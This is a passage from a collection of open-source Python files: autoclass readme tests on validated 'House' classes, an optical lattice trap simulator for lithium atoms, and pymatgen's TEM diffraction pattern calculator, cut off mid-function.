assert np.all(c1.int_array == [0, 2])
assert c1.contrast == "foo"
| {
"content_hash": "f19660a8ac492852e178feb62af6f8ce",
"timestamp": "",
"source": "github",
"line_count": 157,
"max_line_length": 80,
"avg_line_length": 39.43312101910828,
"alnum_prop": 0.5795509610725247,
"repo_name": "wesm/charlton",
"id": "ffda80c394b0f6c78bd7e79650607634d57cbde7",
"size": "6321",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "charlton/categorical.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [],
"symlink_target": ""
} |
import sys
import pytest
from numbers import Real, Integral
from valid8 import Boolean, validate, validate_arg, InputValidationError
from valid8.validation_lib import instance_of, is_multiple_of
try:
from typing import Optional
except ImportError:
pass
from autoclass import autoargs, autoprops, setter_override, autoclass
def test_readme_index_pyfields():
""" """
from pyfields import field
@autoclass
class House(object):
name = field(check_type=True, type_hint=str, doc="the name of your house")
nb_floors = field(default=100, check_type=True, type_hint=int, doc="the nb floors",
validators={"should be positive": lambda x: x >= 0,
"should be a multiple of 100": lambda x: x % 100 == 0})
h = House(name="mine")
with pytest.raises(ValueError):
h.nb_floors = 101
assert str(h) == "House(name='mine', nb_floors=100)"
a = House('my_house', 200)
assert str(a) == "House(name='my_house', nb_floors=200)"
assert [att for att in a.keys()] == ['name', 'nb_floors']
assert {a, a} == {a}
assert a == {'name': 'my_house', 'nb_floors': 200}
def test_readme_index_basic():
""" First basic example in the doc """
@autoclass
class House(object):
def __init__(self, name, nb_floors=1):
pass
a = House('my_house', 3)
assert str(a) == "House(name='my_house', nb_floors=3)"
assert [att for att in a.keys()] == ['name', 'nb_floors']
assert {a, a} == {a}
assert a == {'name': 'my_house', 'nb_floors': 3}
def test_readme_index_basic2():
""" Second basic example in the doc: adding setter override """
global t
t = ''
@autoclass
class House(object):
def __init__(self, name, nb_floors=1):
pass
@setter_override
def nb_floors(self, nb_floors=1):
global t
t = 'Set nb_floors to {}'.format(nb_floors)
self._nb_floors = nb_floors
assert t == ''
obj = House('my_house')
assert t == 'Set nb_floors to 1'
obj.nb_floors = 3
assert t == 'Set nb_floors to 3'
@pytest.mark.skipif(sys.version_info < (3, 0), reason="type hints do not work in python 2")
@pytest.mark.skipif(sys.version_info >= (3, 7), reason="enforce does not work correctly under python 3.7+")
def test_readme_enforce_simple():
""" Example in the doc with enforce """
from ._tests_pep484 import test_readme_enforce_simple
test_readme_enforce_simple()
# @pytest.mark.skipif(sys.version_info < (3, 0), reason="type hints do not work in python 2")
@pytest.mark.skip(reason="Skip until I understand why pytypes makes pytest crash")
def test_readme_index_pytypes_simple():
""" Example in the doc with pytypes """
from ._tests_pep484 import test_readme_index_pytypes_simple
test_readme_index_pytypes_simple()
def test_readme_index_valid8_simple():
""" Example in the doc with valid8 """
from mini_lambda import s, x, Len
# Here we define our 2 validation errors
class InvalidNameError(InputValidationError):
help_msg = 'name should be a non-empty string'
class InvalidSurfaceError(InputValidationError):
help_msg = 'Surface should be between 0 and 10000 and be a multiple of 100.'
@autoclass
class House(object):
@validate_arg('name', instance_of(str), Len(s) > 0,
error_type=InvalidNameError)
@validate_arg('surface', (x >= 0) & (x < 10000), is_multiple_of(100),
error_type=InvalidSurfaceError)
def __init__(self, name, surface=None):
pass
obj = House('sweet home', 200)
obj.surface = None # Valid (surface is nonable by signature)
with pytest.raises(InvalidNameError):
obj.name = 12 # InvalidNameError
with pytest.raises(InvalidSurfaceError):
obj.surface = 10000 # InvalidSurfaceError
@pytest.mark.skipif(sys.version_info < (3, 0), reason="type hints do not work in python 2")
@pytest.mark.skipif(sys.version_info >= (3, 7), reason="enforce does not work correctly under python 3.7+")
def test_readme_index_enforce_valid8():
""" Makes sure that the code in the documentation page is correct for the enforce + valid8 example """
from ._tests_pep484 import test_readme_index_enforce_valid8
test_readme_index_enforce_valid8()
def test_readme_pycontracts_simple():
""" Simple test with pycontracts """
from contracts import contract, ContractNotRespected
@autoclass
class House(object):
@contract(name='str[>0]',
surface='None|(int,>=0,<10000)')
def __init__(self, name, surface):
pass
obj = House('sweet home', 200)
obj.surface = None # Valid (surface is nonable by signature)
with pytest.raises(ContractNotRespected):
obj.name = '' # InvalidNameError
with pytest.raises(ContractNotRespected):
obj.surface = 10000 # InvalidSurfaceError
def test_readme_old_way():
""" Makes sure that the code in the documentation page is correct for the 'old way' of writing classes """
class HouseConfiguration(object):
def __init__(self,
name, # type: str
surface, # type: Real
nb_floors=1, # type: Optional[Integral]
with_windows=False # type: Boolean
):
self.name = name
self.surface = surface
self.nb_floors = nb_floors
self.with_windows = with_windows
# --name
@property
def name(self):
return self._name
@name.setter
def name(self,
name # type: str
):
validate('name', name, instance_of=str)
self._name = name
# --surface
@property
def surface(self):
# type: (...) -> Real
return self._surface
@surface.setter
def surface(self,
surface # type: Real
):
validate('surface', surface, instance_of=Real, min_value=0, min_strict=True)
self._surface = surface
# --nb_floors
@property
def nb_floors(self):
# type: (...) -> Optional[Integral]
return self._nb_floors
@nb_floors.setter
def nb_floors(self,
nb_floors # type: Optional[Integral]
):
validate('nb_floors', nb_floors, instance_of=Integral, enforce_not_none=False)
self._surface = nb_floors # !**
# --with_windows
@property
def with_windows(self):
# type: (...) -> Boolean
return self._with_windows
@with_windows.setter
def with_windows(self,
with_windows # type: Boolean
):
validate('with_windows', with_windows, instance_of=Boolean)
self._with_windows = with_windows
HouseConfiguration('test', 0.1)
def test_readme_pycontracts_complex():
""" Makes sure that the code in the documentation page is correct for the PyContracts example """
from contracts import contract, ContractNotRespected
@autoprops
class HouseConfiguration(object):
@autoargs
@contract(name='str[>0]',
surface='(int|float),>=0',
nb_floors='None|int',
with_windows='bool')
def __init__(self,
name, # type: str
surface, # type: Real
nb_floors=1, # type: Optional[Integral]
with_windows=False # type: Boolean
):
pass
# -- overriden setter for surface - no need to repeat the @contract
@setter_override
def surface(self,
surface # type: Real
):
assert surface > 0
self._surface = surface
t = HouseConfiguration('test', 0.1)
t.nb_floors = None
with pytest.raises(ContractNotRespected):
t.nb_floors = 2.2
with pytest.raises(ContractNotRespected):
t.surface = -1
@pytest.mark.skipif(sys.version_info < (3, 0), reason="type hints do not work in python 2")
@pytest.mark.skip(reason="open bug in pytypes https://github.com/Stewori/pytypes/issues/19")
def test_readme_pytypes_validate_complex():
""" A more complex pytypes + valid8 example """
from ._tests_pep484 import test_readme_pytypes_validate_complex
test_readme_pytypes_validate_complex()
| {
"content_hash": "6e48f68c4f5539abf15a121c067706fc",
"timestamp": "",
"source": "github",
"line_count": 272,
"max_line_length": 110,
"avg_line_length": 32.00735294117647,
"alnum_prop": 0.5822421318630829,
"repo_name": "smarie/python-classtools-autocode",
"id": "1bc25eb3e3c3979e2c8caa6aa154c367f84061bb",
"size": "8706",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "autoclass/tests/doc/test_readme_index.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "60848"
}
],
"symlink_target": ""
} |
'''
Created on Aug 3, 2015
@author: Max
'''
import numpy as np
from liexperiment.lithium.polarizability import polarizability
from amo.core.physicalconstants import PhysicalConstantsSI as c
import amo.optics.monochromaticfields as field
from liexperiment.traps.calibrations import TrapCalibrations
import matplotlib.pylab as plt
import unittest
from astropy.coordinates.tests import accuracy
class Trap(object):
@classmethod
def from_laser_field(cls, monochromatic_field, polarizability):
obj = cls()
obj.potential = lambda x, y, z:-polarizability / (2 * c.epsilon0 * c.c) * monochromatic_field.get_intensity_time_averaged(x, y, z)
return obj
@classmethod
def from_multiple_traps(cls, traps):
obj = cls()
obj.potential = lambda x, y, z: np.sum(np.array([trap.potential(x, y, z) for trap in traps]), axis=0)
return obj
def plot_potential_along_line(self, ax, direction, center, extents, yscale=1.0, num1d=5):
param, potential = self.get_potential_along_line(direction, center, extents, num1d)
ax.plot(param, yscale * potential)
def get_potential_along_line(self, direction, center, extents, num1d=5000):
direction = np.array(direction)
direction = direction / np.sqrt(np.dot(direction, direction))
center = np.array(center)
param = np.linspace(extents[0], extents[1], num1d)
x = center[0] + param * direction[0]
y = center[1] + param * direction[1]
z = center[2] + param * direction[2]
return param, self.potential(x, y, z)
class Lattice2D(Trap):
def __init__(self, theta, phi, waist, power, wavelength, offset, phase0=0.0, visibility=1.0):
lat_field = field.Lattice2d(theta, phi, waist, power, wavelength, offset=offset, phase0=phase0, visibility=visibility)
lat = Trap.from_laser_field(lat_field, polarizability(lat_field.wavelength))
self.potential = lat.potential
class Lattice1D(Trap):
def __init__(self, theta, phi, waist, power, wavelength, offset):
lat_field = field.Lattice1d(theta, phi, waist, power, wavelength, offset=offset)
lat = Trap.from_laser_field(lat_field, polarizability(lat_field.wavelength))
self.potential = lat.potential
class LiLattice(Trap):
def __init__(self, cal, NE_power, NW_power, Ve_power, accordion_power=0.0, dimple_power=0.0):
self.NE_power = NE_power
self.NW_power = NW_power
self.Ve_power = Ve_power
self.accordion_power = accordion_power
self.dimple_power = dimple_power
self.calibration = cal
self.NE_spacing = cal.NE_theta
traps = []
# NE
NE_field = field.Lattice2d(cal.NE_theta, cal.NE_phi, cal.NE_waist, NE_power, cal.NE_wavelength, offset=cal.NE_offset, \
phase=cal.NE_phase, t_retro=cal.NE_t_retro)
self.NE = Trap.from_laser_field(NE_field, polarizability(NE_field.wavelength))
traps.append(self.NE)
# NW
NW_field = field.Lattice2d(cal.NW_theta, cal.NW_phi, cal.NW_waist, NW_power, cal.NW_wavelength, offset=cal.NW_offset, \
phase=cal.NW_phase, t_retro=cal.NW_t_retro)
self.NW = Trap.from_laser_field(NW_field, polarizability(NW_field.wavelength))
traps.append(self.NW)
# Ve
Ve_field = field.Lattice1d(cal.Ve_theta, cal.Ve_phi, cal.Ve_waist, self.Ve_power, cal.Ve_wavelength, offset=cal.Ve_offset)
self.Ve = Trap.from_laser_field(Ve_field, polarizability(Ve_field.wavelength))
traps.append(self.Ve)
# accordion
accordion_field = field.Lattice1d(cal.accordion_theta, cal.accordion_phi, cal.accordion_waist, self.accordion_power, cal.accordion_wavelength, offset=cal.accordion_offset)
self.accordion = Trap.from_laser_field(accordion_field, polarizability(accordion_field.wavelength))
traps.append(self.accordion)
if dimple_power != 0.0:
raise Exception("Dimple not implemented yet")
self.potential = lambda x, y, z: np.sum(np.array([trap.potential(x, y, z) for trap in traps]), axis=0)
def chemical_potential(self, l, m, n):
pass
class TestTrap(unittest.TestCase):
def _testPolarizability(self):
wavelength = 1.064e-6
waist = 80.0e-6
theta = 70.0
phi = 0.0
offset = [0.e-6, 0.e-6, -0.57e-6]
power = 0.5
extents_line = [-5e-6, 5e-6]
center_line = [0., 0., 0.e-6]
direction = [0, 0 , 1]
lat_field = field.Lattice2d(theta, phi, waist, power, wavelength, offset=offset, phase0=0.0)
lat = Trap.from_laser_field(lat_field, polarizability(lat_field.wavelength))
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
lat.plot_potential_along_line(ax, direction, center_line, extents_line, yscale=1.0 / c.h / 1.0e6, num1d=5000)
plt.show()
def _testMultiTrap(self):
wavelength = 1.064e-6
waist = 108.0e-6
waist1 = 42.9e-6
theta = 69.0
theta_vert = 5.86
phi = 0.0
offset = [0.e-6, 0.e-6, 0.0e-6]
power = 1.0
power_vert = 0.0
extents_line = [-20e-6, 20e-6]
center_line = [0., 0., 0.0]
direction = [0, 0, 1]
t_retro = 0.97
lat_field = field.Lattice2d(theta, phi, waist, power, wavelength, offset=offset, phase0=0.0, phase1=0.0, t_retro=t_retro)
lat_field1 = field.Lattice1d(theta_vert, phi, waist1, power_vert, wavelength, offset=offset)
lat = Trap.from_laser_field(lat_field, polarizability(lat_field.wavelength))
lat1 = Trap.from_laser_field(lat_field1, polarizability(lat_field.wavelength))
mytrap = Trap.from_multiple_traps([lat, lat1])
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
mytrap.plot_potential_along_line(ax, direction, center_line, extents_line, yscale=1.0 / c.h / 1.0e6, num1d=5000)
plt.show()
def testLiLattice(self):
NE_power = 0.5
NW_power = 0.5
Ve_power = 0.2
accordion_power = 0.0
cal = TrapCalibrations()
lat = LiLattice(cal, NE_power, NW_power, Ve_power, accordion_power=accordion_power)
center_line = [0., 0., cal.substrate_distance]
extents_line = [-50.e-6, 50.e-6]
direction = [0, 1, 0]
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
lat.plot_potential_along_line(ax, direction, center_line, extents_line, yscale=1.0 / c.h / 1.0e6, num1d=5000)
plt.show()
if __name__ == "__main__":
unittest.main()
plt.show()
| {
"content_hash": "cb06f730b7c96e04253eda1208bffc18",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 179,
"avg_line_length": 43.66451612903226,
"alnum_prop": 0.6134751773049646,
"repo_name": "MaxParsons/amo-physics",
"id": "70e84a2b71eae2fb8c3ebf941e04c281c340eeb6",
"size": "6768",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "liexperiment/traps/trap.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "121239"
}
],
"symlink_target": ""
} |
"""
This module implements a TEM pattern calculator.
"""
import json
import os
from collections import namedtuple
from fractions import Fraction
from functools import lru_cache
from typing import Dict, List, Tuple, cast, Union
import numpy as np
import pandas as pd
import plotly.graph_objs as go
import scipy.constants as sc
from pymatgen.analysis.diffraction.core import AbstractDiffractionPatternCalculator
from pymatgen.core.structure import Structure
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.util.string import latexify_spacegroup, unicodeify_spacegroup
with open(os.path.join(os.path.dirname(__file__), "atomic_scattering_params.json")) as f:
ATOMIC_SCATTERING_PARAMS = json.load(f)
__author__ = "Frank Wan, Jason Liang"
__copyright__ = "Copyright 2020, The Materials Project"
__version__ = "0.22"
__maintainer__ = "Jason Liang"
__email__ = "fwan@berkeley.edu, yhljason@berkeley.edu"
__date__ = "03/31/2020"
class TEMCalculator(AbstractDiffractionPatternCalculator):
"""
Computes the TEM pattern of a crystal structure for multiple Laue zones.
Code partially inspired from XRD calculation implementation. X-ray factor to electron factor
conversion based on the International Table of Crystallography.
#TODO: Could add "number of iterations", "magnification", "critical value of beam",
"twin direction" for certain materials, "sample thickness", and "excitation error s"
"""
def __init__(
self,
symprec: float = None,
voltage: float = 200,
beam_direction: Tuple[int, int, int] = (0, 0, 1),
camera_length: int = 160,
debye_waller_factors: Dict[str, float] = None,
cs: float = 1,
) -> None:
"""
Args:
symprec (float): Symmetry precision for structure refinement. If
set to 0, no refinement is done. Otherwise, refinement is
performed using spglib with provided precision.
voltage (float): The wavelength is a function of the TEM microscope's
voltage. By default, set to 200 kV. Units in kV.
beam_direction (tuple): The direction of the electron beam fired onto the sample.
By default, set to [0,0,1], which corresponds to the normal direction
of the sample plane.
camera_length (int): The distance from the sample to the projected diffraction pattern.
By default, set to 160 cm. Units in cm.
debye_waller_factors ({element symbol: float}): Allows the
specification of Debye-Waller factors. Note that these
factors are temperature dependent.
cs (float): the chromatic aberration coefficient. set by default to 1 mm.
"""
self.symprec = symprec
self.voltage = voltage
self.beam_direction = beam_direction
self.camera_length = camera_length
self.debye_waller_factors = debye_waller_factors or {}
self.cs = cs
@lru_cache(1)
def wavelength_rel(self) -> float:
"""
Calculates the wavelength of the electron beam with relativistic kinematic effects taken
into account.
Args:
none
Returns:
Relativistic Wavelength (in angstroms)
"""
wavelength_rel = (
sc.h
/ np.sqrt(
2 * sc.m_e * sc.e * 1000 * self.voltage * (1 + (sc.e * 1000 * self.voltage) / (2 * sc.m_e * sc.c ** 2))
)
* (10 ** 10)
)
return wavelength_rel
@staticmethod
def generate_points(coord_left: int = -10, coord_right: int = 10) -> np.ndarray:
"""
Generates a bunch of 3D points that span a cube.
Args:
coord_left (int): The minimum coordinate value.
coord_right (int): The maximum coordinate value.
Returns:
Numpy 2d array
"""
points = [0, 0, 0]
coord_values = np.arange(coord_left, coord_right + 1)
points[0], points[1], points[2] = np.meshgrid(coord_values, coord_values, coord_values)
points_matrix = (np.ravel(points[i]) for i in range(0, 3))
result = np.vstack(list(points_matrix)).transpose()
return result
def zone_axis_filter(
self, points: Union[List[Tuple[int, int, int]], np.ndarray], laue_zone: int = 0
) -> Union[List[Tuple[int, int, int]]]:
"""
Filters out all points that exist within the specified Laue zone according to the zone axis rule.
Args:
points (np.ndarray): The list of points to be filtered.
laue_zone (int): The desired Laue zone.
Returns:
list of 3-tuples
"""
if any(isinstance(n, tuple) for n in points):
return list(points)
if len(points) == 0:
return []
filtered = np.where(np.dot(np.array(self.beam_direction), np.transpose(points)) == laue_zone)
result = points[filtered]
result_tuples = cast(List[Tuple[int, int, int]], [tuple(x) for x in result.tolist()])
return result_tuples
def get_interplanar_spacings(
self, structure: Structure, points: Union[List[Tuple[int, int, int]], np.ndarray]
) -> Dict[Tuple[int, int, int], float]:
"""
Args:
structure (Structure): the input structure.
points (tuple): the desired hkl indices.
Returns:
Dict of hkl to its interplanar spacing, in angstroms (float).
"""
points_filtered = self.zone_axis_filter(points)
if (0, 0, 0) in points_filtered:
points_filtered.remove((0, 0, 0))
interplanar_spacings_val = np.array(list(map(lambda x: structure.lattice.d_hkl(x), points_filtered)))
interplanar_spacings = dict(zip(points_filtered, interplanar_spacings_val))
return interplanar_spacings
def bragg_angles(
self, interplanar_spacings: Dict[Tuple[int, int, int], float]
) -> Dict[Tuple[int, int, int], float]:
"""
Gets the Bragg angles for every hkl point passed in (where n = 1).
Args:
interplanar_spacings (dict): dictionary of hkl to interplanar spacing
Returns:
dict of hkl plane (3-tuple) to Bragg angle in radians (float)
"""
plane = list(interplanar_spacings.keys())
interplanar_spacings_val = np.array(list(interplanar_spacings.values()))
bragg_angles_val = np.arcsin(self.wavelength_rel() / (2 * interplanar_spacings_val))
bragg_angles = dict(zip(plane, bragg_angles_val))
return bragg_angles
def get_s2(self, bragg_angles: Dict[Tuple[int, int, int], float]) -> Dict[Tuple[int, int, int], float]:
"""
Calculates the s squared parameter (= square of sin theta over lambda) for each hkl plane.
Args:
bragg_angles (Dict): The bragg angles for each hkl plane.
Returns:
Dict of hkl plane to s2 parameter, calculates the s squared parameter
(= square of sin theta over lambda).
"""
plane = list(bragg_angles.keys())
bragg_angles_val = np.array(list(bragg_angles.values()))
s2_val = (np.sin(bragg_angles_val) / self.wavelength_rel()) ** 2
s2 = dict(zip(plane, s2_val))
return s2
def x_ray_factors(
self, structure: Structure, bragg_angles: Dict[Tuple[int, int, int], float]
) -> Dict[str, Dict[Tuple[int, int, int], float]]:
"""
Calculates x-ray factors, which are required to calculate atomic scattering factors. Method partially inspired
by the equivalent process in the xrd module.
Args:
structure (Structure): The input structure.
bragg_angles (Dict): Dictionary of hkl plane to Bragg angle.
Returns:
dict of atomic symbol to another dict of hkl plane to x-ray factor (in angstroms).
"""
x_ray_factors = {}
s2 = self.get_s2(bragg_angles)
atoms = structure.composition.elements
scattering_factors_for_atom = {}
for atom in atoms:
coeffs = np.array(ATOMIC_SCATTERING_PARAMS[atom.symbol])
for plane in bragg_angles:
scattering_factor_curr = atom.Z - 41.78214 * s2[plane] * np.sum(
coeffs[:, 0] * np.exp(-coeffs[:, 1] * s2[plane]), axis=None
)
scattering_factors_for_atom[plane] = scattering_factor_curr
x_ray_factors[atom.symbol] = scattering_factors_for_atom
scattering_factors_for_atom = {}
return x_ray_factors
def electron_scattering_factors(
self, structure: Structure, bragg_angles: Dict[Tuple[int, int, int], float]
) -> Dict[str, Dict[Tuple[int, int, int], float]]:
"""
Calculates atomic scattering factors for electrons using the Mott-Bethe formula (1st order Born approximation).
Args:
structure (Structure): The input structure.
bragg_angles (dict of 3-tuple to float): The Bragg angles for each hkl plane.
Returns:
dict from atomic symbol to another dict of hkl plane to factor (in angstroms)
"""
electron_scattering_factors = {}
x_ray_factors = self.x_ray_factors(structure, bragg_angles)
s2 = self.get_s2(bragg_angles)
atoms = structure.composition.elements
prefactor = 0.023934
scattering_factors_for_atom = {}
for atom in atoms:
for plane in bragg_angles:
scattering_factor_curr = prefactor * (atom.Z - x_ray_factors[atom.symbol][plane]) / s2[plane]
scattering_factors_for_atom[plane] = scattering_factor_curr
electron_scattering_factors[atom.symbol] = scattering_factors_for_atom
scattering_factors_for_atom = {}
return electron_scattering_factors
def cell_scattering_factors(
self, structure: Structure, bragg_angles: Dict[Tuple[int, int, int], float]
) -> Dict[Tuple[int, int, int], int]:
"""
Calculates the scattering factor for the whole cell.
Args:
structure (Structure): The input structure.
bragg_angles (dict of 3-tuple to float): The Bragg angles for each hkl plane.
Returns:
dict of hkl plane (3-tuple) to scattering factor (in angstroms).
"""
cell_scattering_factors = {}
electron_scattering_factors = self.electron_scattering_factors(structure, bragg_angles)
scattering_factor_curr = 0
for plane in bragg_angles:
for site in structure:
for sp, occu in site.species.items():
g_dot_r = np.dot(np.array(plane), np.transpose(site.frac_coords))
scattering_factor_curr += electron_scattering_factors[sp.symbol][plane] * np.exp(
2j * np.pi * g_dot_r
)
cell_scattering_factors[plane] = scattering_factor_curr
scattering_factor_curr = 0
return cell_scattering_factors
def cell_intensity(
self, structure: Structure, bragg_angles: Dict[Tuple[int, int, int], float]
) -> Dict[Tuple[int, int, int], float]:
"""
Calculates cell intensity for each hkl plane. For simplicity's sake, take I = |F|**2.
Args:
structure (Structure): The input structure.
bragg_angles (dict of 3-tuple to float): The Bragg angles for each hkl plane.
Returns:
dict of hkl plane to cell intensity
"""
csf = self.cell_scattering_factors(structure, bragg_angles)
plane = bragg_angles.keys()
csf_val = np.array(list(csf.values()))
cell_intensity_val = (csf_val * csf_val.conjugate()).real
cell_intensity = dict(zip(plane, cell_intensity_val))
return cell_intensity
def get_pattern(
self,
structure: Structure,
scaled: bool = None,
two_theta_range: Tuple[float, float] = None,
) -> pd.DataFrame:
"""
Returns all relevant TEM DP info in a pandas dataframe.
Args:
structure (Structure): The input structure.
scaled (boolean): Required value for inheritance, does nothing in TEM pattern
two_theta_range (Tuple): Required value for inheritance, does nothing in TEM pattern
Returns:
PandasDataFrame
"""
if self.symprec:
finder = SpacegroupAnalyzer(structure, symprec=self.symprec)
structure = finder.get_refined_structure()
points = self.generate_points(-10, 11)
tem_dots = self.tem_dots(structure, points)
field_names = [
"Position",
"(hkl)",
"Intensity (norm)",
"Film radius",
"Interplanar Spacing",
]
rows_list = []
for dot in tem_dots:
dict1 = {
"Pos": dot.position,
"(hkl)": dot.hkl,
"Intnsty (norm)": dot.intensity,
"Film rad": dot.film_radius,
"Interplanar Spacing": dot.d_spacing,
}
rows_list.append(dict1)
df = pd.DataFrame(rows_list, columns=field_names)
return df
def normalized_cell_intensity(
self, structure: Structure, bragg_angles: Dict[Tuple[int, int, int], float]
) -> Dict[Tuple[int, int, int], float]:
"""
Normalizes the cell_intensity dict to 1, for use in plotting.
Args:
structure (Structure): The input structure.
bragg_angles (dict of 3-tuple to float): The Bragg angles for each hkl plane.
Returns:
dict of hkl plane to normalized cell intensity
"""
normalized_cell_intensity = {}
cell_intensity = self.cell_intensity(structure, bragg_angles)
max_intensity = max(cell_intensity.values())
norm_factor = 1 / max_intensity
for plane in cell_intensity:
normalized_cell_intensity[plane] = cell_intensity[plane] * norm_factor
return normalized_cell_intensity
def is_parallel(
self,
structure: Structure,
plane: Tuple[int, int, int],
other_plane: Tuple[int, int, int],
) -> bool:
"""
Checks if two hkl planes are parallel in reciprocal space.
Args:
structure (Structure): The input structure.
plane (3-tuple): The first plane to be compared.
other_plane (3-tuple): The other plane to be compared.
Returns:
boolean
"""
phi = self.get_interplanar_angle(structure, plane, other_plane)
return phi in (180, 0) or np.isnan(phi)
def get_first_point(self, structure: Structure, points: list) -> Dict[Tuple[int, int, int], float]:
"""
Gets the first point to be plotted in the 2D DP, corresponding to maximum d/minimum R.
Args:
structure (Structure): The input structure.
points (list): All points to be checked.
Returns:
dict of a hkl plane to max interplanar distance.
"""
max_d = -100.0
max_d_plane = (0, 0, 1)
points = self.zone_axis_filter(points)
spacings = self.get_interplanar_spacings(structure, points)
for plane in sorted(spacings.keys()):
if spacings[plane] > max_d:
max_d_plane = plane
max_d = spacings[plane]
return {max_d_plane: max_d}
@staticmethod
def get_interplanar_angle(structure: Structure, p1: Tuple[int, int, int], p2: Tuple[int, int, int]) -> float:
"""
Returns the interplanar angle (in degrees) between the normal of two crystal planes.
Formulas from International Tables for Crystallography Volume C pp. 2-9.
Args:
structure (Structure): The input structure.
p1 (3-tuple): plane 1
p2 (3-tuple): plane 2
Returns:
float
"""
a, b, c = structure.lattice.a, structure.lattice.b, structure.lattice.c
alpha, beta, gamma = (
np.deg2rad(structure.lattice.alpha),
np.deg2rad(structure.lattice.beta),
np.deg2rad(structure.lattice.gamma),
)
v = structure.lattice.volume
a_star = b * c * np.sin(alpha) / v
b_star = a * c * np.sin(beta) / v
c_star = a * b * np.sin(gamma) / v
cos_alpha_star = (np.cos(beta) * np.cos(gamma) - np.cos(alpha)) / (np.sin(beta) * np.sin(gamma))
cos_beta_star = (np.cos(alpha) * np.cos(gamma) - np.cos(beta)) / (np.sin(alpha) * np.sin(gamma))
cos_gamma_star = (np.cos(alpha) * np.cos(beta) - np.cos(gamma)) / (np.sin(alpha) * np.sin(beta))
r1_norm = np.sqrt(
p1[0] ** 2 * a_star ** 2
+ p1[1] ** 2 * b_star ** 2
+ p1[2] ** 2 * c_star ** 2
+ 2 * p1[0] * p1[1] * a_star * b_star * cos_gamma_star
+ 2 * p1[0] * p1[2] * a_star * c_star * cos_beta_star
+ 2 * p1[1] * p1[2] * b_star * c_star * cos_gamma_star
)
r2_norm = np.sqrt(
p2[0] ** 2 * a_star ** 2
+ p2[1] ** 2 * b_star ** 2
+ p2[2] ** 2 * c_star ** 2
+ 2 * p2[0] * p2[1] * a_star * b_star * cos_gamma_star
+ 2 * p2[0] * p2[2] * a_star * c_star * cos_beta_star
+ 2 * p2[1] * p2[2] * b_star * c_star * cos_gamma_star
)
r1_dot_r2 = (
p1[0] * p2[0] * a_star ** 2
+ p1[1] * p2[1] * b_star ** 2
+ p1[2] * p2[2] * c_star ** 2
+ (p1[0] * p2[1] + p2[0] * p1[1]) * a_star * b_star * cos_gamma_star
+ (p1[0] * p2[2] + p2[0] * p1[1]) * a_star * c_star * cos_beta_star
+ (p1[1] * p2[2] + p2[1] * p1[2]) * b_star * c_star * cos_alpha_star
)
phi = np.arccos(r1_dot_r2 / (r1_norm * r2_norm))
return np.rad2deg(phi)
@staticmethod
def get_plot_coeffs(
p1: Tuple[int, int, int],
p2: Tuple[int, int, int],
p3: Tuple[int, int, int],
) -> np.ndarray:
"""
Calculates coefficients of the vector addition required to generate positions for each DP point
by the Moore-Penrose inverse method.
Args:
p1 (3-tuple): The first point. Fixed.
p2 (3-tuple): The second point. Fixed.
p3 (3-tuple): The point whose coefficients are to be calculted.
Returns:
Numpy array
"""
a = np.array([[p1[0], p2[0]], [p1[1], p2[1]], [p1[2], p2[2]]])
b = np.array([[p3[0], p3[1], p3[2]]]).T
a_pinv = np.linalg.pinv(a)
x = np.dot(a_pinv, b)
return np.ravel(x)
def get_positions(self, structure: Structure, points: list) -> Dict[Tuple[int, int, int], np.ndarray]:
"""
Calculates all the positions of each hkl point in the 2D diffraction pattern by vector addition.
Distance in centimeters.
Args:
structure (Structure): The input structure.
points (list): All points to be checked.
Returns:
dict of hkl plane to xy-coordinates.
"""
positions = {}
points = self.zone_axis_filter(points)
# first is the max_d, min_r
first_point_dict = self.get_first_point(structure, points)
for point, v in first_point_dict.items():
first_point = point
first_d = v
spacings = self.get_interplanar_spacings(structure, points)
# second is the first non-parallel-to-first-point vector when sorted.
# note 000 is "parallel" to every plane vector.
for plane in sorted(spacings.keys()):
second_point, second_d = plane, spacings[plane]
if not self.is_parallel(structure, first_point, second_point):
break
p1 = first_point
p2 = second_point
if (0, 0, 0) in points:
points.remove((0, 0, 0))
points.remove(first_point)
points.remove(second_point)
positions[(0, 0, 0)] = np.array([0, 0])
r1 = self.wavelength_rel() * self.camera_length / first_d
positions[first_point] = np.array([r1, 0])
r2 = self.wavelength_rel() * self.camera_length / second_d
phi = np.deg2rad(self.get_interplanar_angle(structure, first_point, second_point))
positions[second_point] = np.array([r2 * np.cos(phi), r2 * np.sin(phi)])
for plane in points:
coeffs = self.get_plot_coeffs(p1, p2, plane)
pos = np.array(
[
coeffs[0] * positions[first_point][0] + coeffs[1] * positions[second_point][0],
coeffs[0] * positions[first_point][1] + coeffs[1] * positions[second_point][1],
]
)
positions[plane] = pos
points.append((0, 0, 0))
points.append(first_point)
points.append(second_point)
return positions
def tem_dots(self, structure: Structure, points) -> List:
"""
Generates all TEM_dot as named tuples that will appear on the 2D diffraction pattern.
Args:
structure (Structure): The input structure.
points (list): All points to be checked.
Returns:
list of TEM_dots
"""
dots = []
interplanar_spacings = self.get_interplanar_spacings(structure, points)
bragg_angles = self.bragg_angles(interplanar_spacings)
cell_intensity = self.normalized_cell_intensity(structure, bragg_angles)
positions = self.get_positions(structure, points)
for hkl, intensity in cell_intensity.items():
dot = namedtuple("dot", ["position", "hkl", "intensity", "film_radius", "d_spacing"])
position = positions[hkl]
film_radius = 0.91 * (10 ** -3 * self.cs * self.wavelength_rel() ** 3) ** Fraction("1/4")
d_spacing = interplanar_spacings[hkl]
tem_dot = dot(position, hkl, intensity, film_radius, d_spacing)
dots.append(tem_dot)
return dots
def get_plot_2d(self, structure: Structure) -> go.Figure:
"""
Generates the 2D diffraction pattern of the input structure.
Args:
structure (Structure): The input structure.
Returns:
Figure
"""
if self.symprec:
finder = SpacegroupAnalyzer(structure, symprec=self.symprec)
structure = finder.get_refined_structure()
points = self.generate_points(-10, 11)
tem_dots = self.tem_dots(structure, points)
xs = []
ys = []
hkls = []
intensities = []
for dot in tem_dots:
xs.append(dot.position[0])
